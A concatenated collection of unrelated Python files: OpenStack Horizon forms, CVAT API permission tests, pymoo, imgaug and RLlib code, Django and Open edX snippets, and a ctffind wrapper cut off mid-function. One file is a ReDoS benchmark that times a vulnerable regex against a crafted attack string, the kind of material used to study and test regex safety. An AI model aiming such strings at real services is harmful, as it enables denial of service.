floating_ip_id = forms.CharField(widget=forms.HiddenInput())
def handle(self, request, data):
try:
LOG.info('Releasing Floating IP "%s"' % data['floating_ip_id'])
api.tenant_floating_ip_release(request, data['floating_ip_id'])
messages.info(request, _('Successfully released Floating IP: %s')
% data['floating_ip_id'])
except novaclient_exceptions.ClientException, e:
LOG.exception("ClientException in ReleaseFloatingIp")
messages.error(request, _('Error releasing Floating IP '
'from tenant: %s') % e.message)
return shortcuts.redirect(request.build_absolute_uri())
class FloatingIpAssociate(forms.SelfHandlingForm):
floating_ip_id = forms.CharField(widget=forms.HiddenInput())
floating_ip = forms.CharField(widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
instance_id = forms.ChoiceField()
def __init__(self, *args, **kwargs):
super(FloatingIpAssociate, self).__init__(*args, **kwargs)
instancelist = kwargs.get('initial', {}).get('instances', [])
self.fields['instance_id'] = forms.ChoiceField(
choices=instancelist,
label=_("Instance"))
def handle(self, request, data):
try:
api.server_add_floating_ip(request,
data['instance_id'],
data['floating_ip_id'])
LOG.info('Associating Floating IP "%s" with Instance "%s"'
% (data['floating_ip'], data['instance_id']))
messages.info(request, _('Successfully associated Floating IP: \
%(ip)s with Instance: %(inst)s'
% {"ip": data['floating_ip'],
"inst": data['instance_id']}))
except novaclient_exceptions.ClientException, e:
LOG.exception("ClientException in FloatingIpAssociate")
messages.error(request, _('Error associating Floating IP: %s')
% e.message)
return shortcuts.redirect('horizon:nova:floating_ips:index')
class FloatingIpDisassociate(forms.SelfHandlingForm):
floating_ip_id = forms.CharField(widget=forms.HiddenInput())
def handle(self, request, data):
try:
fip = api.tenant_floating_ip_get(request, data['floating_ip_id'])
api.server_remove_floating_ip(request, fip.instance_id, fip.id)
LOG.info('Disassociating Floating IP "%s"'
% data['floating_ip_id'])
messages.info(request,
_('Successfully disassociated Floating IP: %s')
% data['floating_ip_id'])
except novaclient_exceptions.ClientException, e:
LOG.exception("ClientException in FloatingIpAssociate")
messages.error(request, _('Error disassociating Floating IP: %s')
% e.message)
return shortcuts.redirect('horizon:nova:floating_ips:index')
class FloatingIpAllocate(forms.SelfHandlingForm):
tenant_id = forms.CharField(widget=forms.HiddenInput())
def handle(self, request, data):
try:
fip = api.tenant_floating_ip_allocate(request)
LOG.info('Allocating Floating IP "%s" to tenant "%s"'
% (fip.ip, data['tenant_id']))
messages.success(request,
_('Successfully allocated Floating IP "%(ip)s"\
to tenant "%(tenant)s"')
% {"ip": fip.ip, "tenant": data['tenant_id']})
except novaclient_exceptions.ClientException, e:
LOG.exception("ClientException in FloatingIpAllocate")
messages.error(request, _('Error allocating Floating IP "%(ip)s"\
to tenant "%(tenant)s": %(msg)s') %
{"ip": fip.ip, "tenant": data['tenant_id'], "msg": e.message})
return shortcuts.redirect('horizon:nova:floating_ips:index')
|
#display records of students of roll no. 22 and 23.
import pickle
stu = {} #declare empty dictionary object; it will hold record
found = False
finObj = open('Stu.dat',"rb") #open binary file in read mode
searchKeys = [22,23]
#read from the file
try:
print("File Stu.dat store these records")
while True: #it will become False upon EOF Exception.
stu = pickle.load(finObj) #read record in stu dictionary fron finObj file handle
if stu['Rollno'] in searchKeys:
print(stu) #print the record
found = True
except EOFError:
if found == False:
print("No such records found in the file")
else:
print("Search successful.")
finObj.close() #close file
|
from hipchat import HipChatManager
import time
import configparser
_MAX_SLEEP_TIME = 5
_MIN_SLEEP_TIME = 2
_SPAM_EODBOT_URL = 3500
class HipChatMonitor:
def __init__(self, eodBotParser):
print("Initializing HipChatMonitor with eodBotParser: ",eodBotParser)
self.sleepTime = _MIN_SLEEP_TIME
self.lastIdChecked = ""
self.eodBotParser = eodBotParser
config = configparser.ConfigParser()
config.read('config.ini')
self.bot_id=config['HIPCHAT']['hipchat.bot_id']
self.hipChatManager = HipChatManager.HipChatManager();
self.spamLastEodBotUrlTime = 0
self.hipChatManager.send("[EodBot] I've been initialised! Troll time just started :)")
self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
def __adjustInterval(self, failed):
if(failed == "true"):
if(self.sleepTime < _MAX_SLEEP_TIME):
self.sleepTime += 1
else:
self.sleepTime = _MIN_SLEEP_TIME
def start(self):
while 1==1:
newestMessage = self.hipChatManager.fetch()
if((str(newestMessage["from"]) != "Sassy") and (str(newestMessage["from"]["id"]) != self.bot_id) and (newestMessage["id"] != self.lastIdChecked)):
self.lastIdChecked = newestMessage["id"]
print("Parsing message: ",newestMessage['message'])
messageToSend = self.eodBotParser.parse(newestMessage['message'])
if(messageToSend != None):
self.hipChatManager.send(messageToSend)
self.__adjustInterval("false")
else:
self.__adjustInterval("true")
print("Sleeping for ",self.sleepTime," seconds")
time.sleep(self.sleepTime)
self.spamLastEodBotUrlTime += 1
if(self.spamLastEodBotUrlTime >= _SPAM_EODBOT_URL):
self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
self.spamLastEodBotUrlTime = 0
|
# Copyright (c) 2013-2014 by California Institute of Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the California Institute of Technology nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH
# OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
"""TuLiP Toolbox Transition System subpackage
Suggested abbreviation:
>>> from tulip import transys as trs
"""
from __future__ import absolute_import
from .mathset import MathSet, SubSet, PowerSet, TypedDict
from .labeled_graphs import prepend_with
from .transys import (
KripkeStructure, FiniteTransitionSystem, FTS,
LabeledGameGraph,
tuple2fts, line_labeled_with, cycle_labeled_with
)
from .automata import (
BuchiAutomaton, BA, tuple2ba,
RabinAutomaton, DRA,
ParityGame
)
from .machines import MooreMachine, MealyMachine
from .products import OnTheFlyProductAutomaton
|
class Solution:
def findNumbers(self, nums: List[int]) -> int:
bkt =[]
for n in nums:
count = str(n).count('')-1
print (str(n), count)
if count%2 == 0 :
bkt.append(count)
count =0
count =0
return len(bkt)
|
# Copyright (C) 2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
from http import HTTPStatus
from deepdiff import DeepDiff
import pytest
from .utils.config import get_method, patch_method
def get_job_staff(job, tasks, projects):
job_staff = []
job_staff.append(job['assignee'])
tid = job['task_id']
job_staff.append(tasks[tid]['owner'])
job_staff.append(tasks[tid]['assignee'])
pid = job['project_id']
if pid:
job_staff.append(projects[pid]['owner'])
job_staff.append(projects[pid]['assignee'])
job_staff = set(u['id'] for u in job_staff if u is not None)
return job_staff
def filter_jobs(jobs, tasks, org):
if org is None:
kwargs = {}
jobs = jobs.raw
elif org == '':
kwargs = {'org': ''}
jobs = [job for job in jobs
if tasks[job['task_id']]['organization'] is None]
else:
kwargs = {'org_id': org}
jobs = [job for job in jobs
if tasks[job['task_id']]['organization'] == org]
return jobs, kwargs
class TestGetJobs:
def _test_get_job_200(self, user, jid, data, **kwargs):
response = get_method(user, f'jobs/{jid}', **kwargs)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json()) == {}
def _test_get_job_403(self, user, jid, **kwargs):
response = get_method(user, f'jobs/{jid}', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [None, '', 1, 2])
def test_admin_get_job(self, jobs, tasks, org):
jobs, kwargs = filter_jobs(jobs, tasks, org)
# keep only the reasonable amount of jobs
for job in jobs[:8]:
self._test_get_job_200('admin2', job['id'], job, **kwargs)
@pytest.mark.parametrize('org_id', ['', None, 1, 2])
@pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
def test_non_admin_get_job(self, org_id, groups, users, jobs, tasks, projects,
org_staff):
# keep the reasonable amount of users and jobs
users = [u for u in users if u['groups'] == groups][:4]
jobs, kwargs = filter_jobs(jobs, tasks, org_id)
org_staff = org_staff(org_id)
for job in jobs[:8]:
job_staff = get_job_staff(job, tasks, projects)
# check if the specific user in job_staff to see the job
for user in users:
if user['id'] in job_staff | org_staff:
self._test_get_job_200(user['username'], job['id'], job, **kwargs)
else:
self._test_get_job_403(user['username'], job['id'], **kwargs)
class TestListJobs:
def _test_list_jobs_200(self, user, data, **kwargs):
response = get_method(user, 'jobs', **kwargs, page_size=all)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json()['results']) == {}
def _test_list_jobs_403(self, user, **kwargs):
response = get_method(user, 'jobs', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [None, '', 1, 2])
def test_admin_list_jobs(self, jobs, tasks, org):
jobs, kwargs = filter_jobs(jobs, tasks, org)
self._test_list_jobs_200('admin1', jobs, **kwargs)
@pytest.mark.parametrize('org_id', ['', None, 1, 2])
@pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
def test_non_admin_list_jobs(self, org_id, groups, users, jobs, tasks,
projects, org_staff, is_org_member):
users = [u for u in users if u['groups'] == groups][:2]
jobs, kwargs = filter_jobs(jobs, tasks, org_id)
org_staff = org_staff(org_id)
for user in users:
user_jobs = []
for job in jobs:
job_staff = get_job_staff(job, tasks, projects)
if user['id'] in job_staff | org_staff:
user_jobs.append(job)
if is_org_member(user['id'], org_id):
self._test_list_jobs_200(user['username'], user_jobs, **kwargs)
else:
self._test_list_jobs_403(user['username'], **kwargs)
class TestGetAnnotations:
def _test_get_job_annotations_200(self, user, jid, data, **kwargs):
response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json(),
exclude_paths="root['version']") == {}
def _test_get_job_annotations_403(self, user, jid, **kwargs):
response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [''])
@pytest.mark.parametrize('groups, job_staff, is_allow', [
(['admin'], True, True), (['admin'], False, True),
(['business'], True, True), (['business'], False, False),
(['worker'], True, True), (['worker'], False, False),
(['user'], True, True), (['user'], False, False)
])
def test_user_get_job_annotations(self, org, groups, job_staff,
is_allow, users, jobs, tasks, annotations, find_job_staff_user):
users = [u for u in users if u['groups'] == groups]
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, job_id = find_job_staff_user(jobs, users, job_staff)
if is_allow:
self._test_get_job_annotations_200(username,
job_id, annotations['job'][str(job_id)], **kwargs)
else:
self._test_get_job_annotations_403(username, job_id, **kwargs)
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, job_staff, is_allow', [
('owner', True, True), ('owner', False, True),
('maintainer', True, True), ('maintainer', False, True),
('supervisor', True, True), ('supervisor', False, False),
('worker', True, True), ('worker', False, False),
])
def test_member_get_job_annotations(self, org, role, job_staff, is_allow,
jobs, tasks, find_job_staff_user, annotations, find_users):
users = find_users(org=org, role=role)
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, jid = find_job_staff_user(jobs, users, job_staff)
if is_allow:
self._test_get_job_annotations_200(username,
jid, annotations['job'][str(jid)], **kwargs)
else:
self._test_get_job_annotations_403(username, jid, **kwargs)
@pytest.mark.parametrize('org', [1])
@pytest.mark.parametrize('privilege, is_allow', [
('admin', True), ('business', False), ('worker', False), ('user', False)
])
def test_non_member_get_job_annotations(self, org, privilege, is_allow,
jobs, tasks, find_job_staff_user, annotations, find_users):
users = find_users(privilege=privilege, exclude_org=org)
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, job_id = find_job_staff_user(jobs, users, False)
kwargs = {'org_id': org}
if is_allow:
self._test_get_job_annotations_200(username,
job_id, annotations['job'][str(job_id)], **kwargs)
else:
self._test_get_job_annotations_403(username, job_id, **kwargs)
class TestPatchJobAnnotations:
_ORG = 2
def _test_check_respone(self, is_allow, response, data=None):
if is_allow:
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json(),
exclude_paths="root['version']") == {}
else:
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.fixture(scope='class')
def request_data(self, annotations):
def get_data(jid):
data = annotations['job'][str(jid)].copy()
data['shapes'][0].update({'points': [2.0, 3.0, 4.0, 5.0, 6.0, 7.0]})
data['version'] += 1
return data
return get_data
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, job_staff, is_allow', [
('maintainer', False, True), ('owner', False, True),
('supervisor', False, False), ('worker', False, False),
('maintainer', True, True), ('owner', True, True),
('supervisor', True, True), ('worker', True, True)
])
def test_member_update_job_annotations(self, org, role, job_staff, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(role=role, org=org)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, job_staff)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations',
data, org_id=org, action='update')
self._test_check_respone(is_allow, response, data)
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('privilege, is_allow', [
('admin', True), ('business', False), ('worker', False), ('user', False)
])
def test_non_member_update_job_annotations(self, org, privilege, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(privilege=privilege, exclude_org=org)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, False)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations', data,
org_id=org, action='update')
self._test_check_respone(is_allow, response, data)
@pytest.mark.parametrize('org', [''])
@pytest.mark.parametrize('privilege, job_staff, is_allow', [
('admin', True, True), ('admin', False, True),
('business', True, True), ('business', False, False),
('worker', True, True), ('worker', False, False),
('user', True, True), ('user', False, False)
])
def test_user_update_job_annotations(self, org, privilege, job_staff, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(privilege=privilege)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, job_staff)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations', data,
org_id=org, action='update')
self._test_check_respone(is_allow, response, data)
class TestPatchJob:
_ORG = 2
@pytest.fixture(scope='class')
def find_task_staff_user(self, is_task_staff):
def find(jobs, users, is_staff):
for job in jobs:
for user in users:
if is_staff == is_task_staff(user['id'], job['task_id']):
return user, job['id']
return None, None
return find
@pytest.fixture(scope='class')
def expected_data(self, jobs, users):
keys = ['url', 'id', 'username', 'first_name', 'last_name']
def find(job_id, assignee_id):
data = jobs[job_id].copy()
data['assignee'] = dict(filter(lambda a: a[0] in keys,
users[assignee_id].items()))
return data
return find
@pytest.fixture(scope='class')
def new_assignee(self, jobs, tasks, assignee_id, org_staff):
def find_new_assignee(jid, user_id):
members = org_staff(tasks[jobs[jid]['task_id']]['organization'])
members -= {assignee_id(jobs[jid]), user_id}
return members.pop()
return find_new_assignee
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, task_staff, is_allow', [
('maintainer', False, True), ('owner', False, True),
('supervisor', False, False), ('worker', False, False),
('maintainer', True, True), ('owner', True, True),
('supervisor', True, True), ('worker', True, True)
])
def test_member_update_job_assignee(self, org, role, task_staff, is_allow,
find_task_staff_user, find_users, jobs_by_org, new_assignee, expected_data):
users, jobs = find_users(role=role, org=org), jobs_by_org[org]
user, jid = find_task_staff_user(jobs, users, task_staff)
assignee = new_assignee(jid, user['id'])
response = patch_method(user['username'], f'jobs/{jid}',
{'assignee': assignee}, org_id=self._ORG)
if is_allow:
assert response.status_code == HTTPStatus.OK
assert DeepDiff(expected_data(jid, assignee), response.json()) == {}
else:
assert response.status_code == HTTPStatus.FORBIDDEN
|
# Generated by Django 3.0.3 on 2020-02-11 20:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='choice',
name='votes',
field=models.IntegerField(default=0),
),
]
|
import numpy as np
from pymoo.core.survival import Survival
from pymoo.util.nds.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
# ---------------------------------------------------------------------------------------------------------
# Survival Selection
# ---------------------------------------------------------------------------------------------------------
class RankAndNoveltySurvival(Survival):
def __init__(self, nds=None) -> None:
super().__init__(filter_infeasible=True)
self.nds = nds if nds is not None else NonDominatedSorting()
def _do(self, problem, pop, *args, n_survive=None, **kwargs):
# get the objective space values and objects
F = pop.get("F").astype(float, copy=False)
# the final indices of surviving individuals
survivors = []
# do the non-dominated sorting until splitting front
fronts = self.nds.do(F, n_stop_if_ranked=n_survive)
for k, front in enumerate(fronts):
# calculate the novelty of the front
novelty_of_front = get_unaligned_novelty(pop[front])
# save rank and crowding in the individual class
for j, i in enumerate(front):
pop[i].set("rank", k)
pop[i].set("crowding", novelty_of_front[j])
# current front sorted by crowding distance if splitting
if len(survivors) + len(front) > n_survive:
I = randomized_argsort(novelty_of_front, order='descending', method='numpy')
I = I[:(n_survive - len(survivors))]
# otherwise take the whole front unsorted
else:
I = np.arange(len(front))
# extend the survivors by all or selected individuals
survivors.extend(front[I])
return pop[survivors]
def get_unaligned_novelty(pop):
return np.array([x_i.X.unaligned_novelty_metric for x_i in pop])
|
from unittest import TestCase, skipIf
class TestAll(TestCase):
def test_passing(self):
pass
def test_erroring(self):
raise Exception("Ima broke")
def test_failing(self):
self.assertEquals(2 + 2 * 2, 8)
@skipIf(2 > 1, "Skip everytime")
def test_skipped(self):
pass
|
# 6851
# ^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$
# EXPONENT
# nums:4
# EXPONENT AttackString:"a"+"0"*32+"!1 __NQ"
import re
from time import perf_counter
regex = """^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "a" + "0" * i * 1 + "!1 __NQ"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *1}: took {DURATION} seconds!")
|
"""
This must be run only after seed_permissions_roles.py!
Creates default roles for all users currently in the database. Just runs through
Enrollments.
"""
from django.core.management.base import BaseCommand
from common.djangoapps.student.models import CourseEnrollment
from openedx.core.djangoapps.django_comment_common.models import assign_default_role_on_enrollment
class Command(BaseCommand): # lint-amnesty, pylint: disable=missing-class-docstring
help = 'Seed default permisssions and roles.'
def handle(self, *args, **options):
print('Updated roles for ', end=' ')
for i, enrollment in enumerate(CourseEnrollment.objects.filter(is_active=1), start=1):
assign_default_role_on_enrollment(None, enrollment)
if i % 1000 == 0:
print(f'{i}...', end=' ')
print()
|
import imgaug as ia
from imgaug import augmenters as iaa
import numpy as np
from scipy import misc
import imageio
import cv2
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables import Keypoint, KeypointsOnImage
ia.seed(1)
image = ia.quokka(size=(256, 256))
kps = KeypointsOnImage([
Keypoint(x=65, y=100),
Keypoint(x=75, y=200),
Keypoint(x=100, y=100),
Keypoint(x=200, y=80)
], shape=image.shape)
seq = iaa.Sequential([
iaa.Multiply((1.2, 1.5)), # change brightness, doesn't affect keypoints
iaa.Affine(
rotate=10,
scale=(0.5, 0.7)
) # rotate by exactly 10deg and scale to 50-70%, affects keypoints
])
# Augment keypoints and images.
image_aug, kps_aug = seq(image=image, keypoints=kps)
# print coordinates before/after augmentation (see below)
# use after.x_int and after.y_int to get rounded integer coordinates
for i in range(len(kps.keypoints)):
before = kps.keypoints[i]
after = kps_aug.keypoints[i]
print("Keypoint %d: (%.8f, %.8f) -> (%.8f, %.8f)" % (
i, before.x, before.y, after.x, after.y)
)
# image with keypoints before/after augmentation (shown below)
image_before = kps.draw_on_image(image, size=7)
image_after = kps_aug.draw_on_image(image_aug, size=7)
def main():
imgs = np.zeros((1, 100, 100, 3), dtype=np.uint8) + 255
bbs = ia.BoundingBoxesOnImage([
ia.BoundingBox(x1=0, x2=50, y1=0, y2=50)
], shape=imgs.shape[1:])
aug = iaa.Sequential([
iaa.Crop(px=10),
iaa.Pad(px=10, pad_cval=128),
iaa.Affine(scale=0.5, cval=0)
])
aug_det = aug.to_deterministic()
imgs_aug = aug_det.augment_images(imgs)
bbs_aug = aug_det.augment_bounding_boxes([bbs])
print("bbs:")
for bbs_aug_i in bbs_aug[0].bounding_boxes:
print(bbs_aug_i)
cv2.imshow('orig',imgs)
cv2.imshow('aug',bbs_aug[0].draw_on_image(imgs_aug[0]))
cv2.waitKey()
if __name__ == "__main__":
main()
|
from typing import Optional
import gym
import pytest
from ray.rllib.env.wrappers.moab_wrapper import _MoabBaseWrapper
from ray.tune.registry import ENV_CREATOR, _global_registry
@pytest.mark.parametrize("env_name, iterations",
[
("MoabMoveToCenterSim-v0", 10),
("MoabMoveToCenterPartialObservableSim-v0", 10),
("MoabMoveToCenterAvoidObstacleSim-v0", 3),],
)
@pytest.mark.parametrize("randomize_ball", [True, False])
@pytest.mark.parametrize("randomize_obstacle", [True, False])
@pytest.mark.parametrize("seed", [None, 1])
class TestMoabWrapper:
@pytest.fixture
def env_name(self) -> str:
return "MoabMoveToCenterSim-v0"
@pytest.fixture
def randomize_ball(self) -> bool:
return False
@pytest.fixture
def randomize_obstacle(self) -> bool:
return False
@pytest.fixture
def seed(self) -> Optional[int]:
return None
@pytest.fixture
def iterations(self) -> int:
return 3
@pytest.fixture
def moab_env(self,
env_name: str,
randomize_ball: bool,
randomize_obstacle: bool,
seed: Optional[int]) -> _MoabBaseWrapper:
env_creator = _global_registry.get(ENV_CREATOR, env_name)
env_config = {
"randomize_ball": randomize_ball,
"randomize_obstacle": randomize_obstacle,
"seed": seed,
}
return env_creator(env_config)
def test_observation_space(self, moab_env: _MoabBaseWrapper, iterations: int):
obs = moab_env.reset()
assert (moab_env.observation_space.contains(obs),
f"{moab_env.observation_space} doesn't contain {obs}")
new_obs, _, _, _ = moab_env.step(moab_env.action_space.sample())
assert moab_env.observation_space.contains(new_obs)
def test_action_space_conversion(self, moab_env: _MoabBaseWrapper, iterations: int):
assert isinstance(moab_env.action_space, gym.spaces.Box)
moab_env.reset()
action = moab_env.action_space.sample()
moab_env.step(action)
def test_few_iterations(self, moab_env: _MoabBaseWrapper, iterations: int):
moab_env.reset()
for _ in range(iterations):
moab_env.step(moab_env.action_space.sample())
|
"""
Functions related to ctf.
Currently only few that allow running ctffind from console or notebook.
Work in progress.
# Author: Vladan Lucic (Max Planck Institute for Biochemistry)
# $Id$
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from past.builtins import basestring
__version__ = "$Revision$"
import os
import subprocess
import logging
import numpy as np
import matplotlib.pyplot as plt
import pyto.util.nested
from pyto.io.image_io import ImageIO
from pyto.grey.image import Image
class Ctf(object):
"""
Determination of CTF by external tools
"""
# prefix for validation attributed obtained from gctf
validation_prefix = "validation_"
# default params ctffind 4.0.17, also 4.1
default_params_ctffind = {
"pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
'def_step':500, 'astig':100, 'known_astig':'no', 'slow_search':'yes',
'restraint_astig':'yes', 'tolerated_astig':200,
'phase':'yes', 'min_phase':0, 'max_phase':2, 'phase_step':0.1,
'expert':'no'}
# parameter list for ctffind 4.0.17 (currently not used, left for reference)
param_names_ctffind_4_0 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step']
# default parameter list for 4.1; consistent with default_params_ctffind
param_names_ctffind_4_1 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'known_astig', 'slow_search',
'restraint_astig','tolerated_astig',
'phase', 'min_phase', 'max_phase', 'phase_step', 'expert']
def __init__(self):
"""
Initializes common attributes
"""
# attributes
self.image_path_orig = []
self.image_inds = []
self.image_path = []
self.ctf_path = []
self.phases = []
self.defoci_1 = []
self.defoci_2 = []
self.defoci = []
self.resolution = []
self.pixel_a = []
self.angle = []
@classmethod
def find(
cls, image_dir, image_prefix, ctf_dir, params, pixel_a=None,
flatten='auto', tool='ctffind', executable=None,
param_file='ctf_params.txt', fast=False, max_images=None,
plot_ctf=True, plot_ps=True, b_plot=True, exp_f_plot=False,
show_legend=True, plot_phases=True, plot_defoci=True,
plot_resolution=True, print_results=True, print_validation=False):
"""
Determines and shows CTF fits for multiple images.
All files located in (arg) image_dir whose namess start with (arg)
image_prefix and that have extension mrc, em or st are selected
for the ctf determination.
If a selected file is 3D (image stack), and arg flatten is True or
'auto', all z-slices are summed up (saved in ctf_dir) and the ctf
is detemined on the resulting (flattened. Alternatively, if arg
flatten is False, z-slices are extracted, saved in ctf_dir and
analyzed separately.
All resulting files, as well as the extraced or flattened images
(in case of 3D files) are saved or moved to directory ctf_dir.
CTF is determined using external tools. Current options are:
- CTFFIND
- gCTF
These tools have to be installed externally.
Parameters for the ctf tools are specified as a dictionary (arg params).
Parameters used for both ctffind and gctf are:
- 'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step'
Voltage ('voltage') should always be specified. The pixel size
(pixel_a) has to be specified in case it can not be read from
the image header. All other parameters are optional, if they are
not specified the ctffind / gctg default values are used.
The default values should be fine for single particle images.
Parameter recommendations for phase plate images are given in
the ctffind / gctf documentation.
In case of ctffind, arg params can also be a list containing the
parameter values in the same order as specified above, starting
with voltage.
Important for ctffind: Because the required arguments differ between
versions 4.0 and 4.1, as well as depend on values specified, it is
not guaranteed that the dictionary form of arg params will work.
In case of problems, specify params as a list.
In addition, all other gctf arguments can also be specified
(without '--'). It is suggested to use:
'do_EPA':'', 'do_validation':''
Parameter units are the same as in the ctf deterimantion tools.
Intended for use in an environment such as Jupyter notebook.
Arguments:
- image_dir: directory where images reside
- image prefix: beginning of image file(s)
- ctf_dir: directory where the ctf determination results and
extracted images are saved
- pixel_a: pixel size in A
- params: ctf determination parameters
- flatten: indicated whether 3D images should be flatten (True or
'auto') or not (False).
- tool: name of the ctf detmination tool
- executable: ctf tool executable
- param_file: name of the temporary parameter file
- fast: flag indicating whether ctffind --fast option is used
- print_results: flag indicating if phase and defoci found
are printed for each analyzed image
- plot_ctf: flag indicating whether ctf is plotted for each
analyzed image
- show_legend: flag indicating whether a legend is shown on ctf graphs
- plot_phases, plot_defoci: flags indicating whether a graph
containing phases and defoci of all images respectivelly are plotted
- max_images: max number if image analyzed, for testing
Returns an instance of this class. The following attributes are all
lists where elements correspond to individual images:
- image_path_orig: image path of the input file
- image_path: image path of the image that is actually used
to deterime ctf. It differs from image_path_orig if the original
(input) image is a stack that is flattened or used to extract slices
- image_inds: index of a slice extracted for a stack
- ctf_path: path of the ctf fit image
- defocus_1, defocus_2, defocus: defoci along the two axes and the
mean defocus in um
- angle: defocus (astigmatism) angle
- phase: phase shift in multiples of pi
- resolution: resolution in nm
- ccc: correlation coefficient
- pixel_a: pixel size in A
- b_factor: b-factor (gctf only)
"""
# initialize
index = 0
new = cls()
print_head = True
if plot_ctf and fast:
print(
"Warning: CTF will not be plotted because fast execution"
+ " was chosen")
# check which ctf tool to use
if tool == 'ctffind':
if executable is None:
executable = 'ctffind'
elif tool == 'gctf':
if executable is None:
executable = 'gctf'
else:
raise ValueError(
"CTF determination tool " + str(tool) + " was not understood.")
new.tool = tool
# cftfind on all images
file_list = np.sort(os.listdir(image_dir))
for image_name in file_list:
# skip files that are not images
if not image_name.startswith(image_prefix): continue
if not (image_name.endswith('.mrc') or image_name.endswith('.st')
or image_name.endswith('.em')):
continue
if image_name.endswith('ctf.mrc'): continue
# set input image path
image_path = os.path.join(image_dir, image_name)
# figure out if to flatten or not (just once, assume all files
# are the same)
im_io = ImageIO(file=image_path)
if image_name.endswith('.st'):
im_io.readHeader(fileFormat='mrc')
else:
im_io.readHeader()
z_dim = im_io.shape[2]
n_digits = int(np.ceil(np.log10(z_dim)))
if isinstance(flatten, bool):
pass
elif isinstance(flatten, basestring) and (flatten == 'auto'):
if z_dim > 1:
flatten = True
else:
flatten = False
else:
raise ValueError(
"Argument flatten: "+ str(flatten) +" was not understood.")
# load stack and prepare image name, if need to extract images
if (z_dim > 1) and not flatten:
image_dir, image_name = os.path.split(image_path)
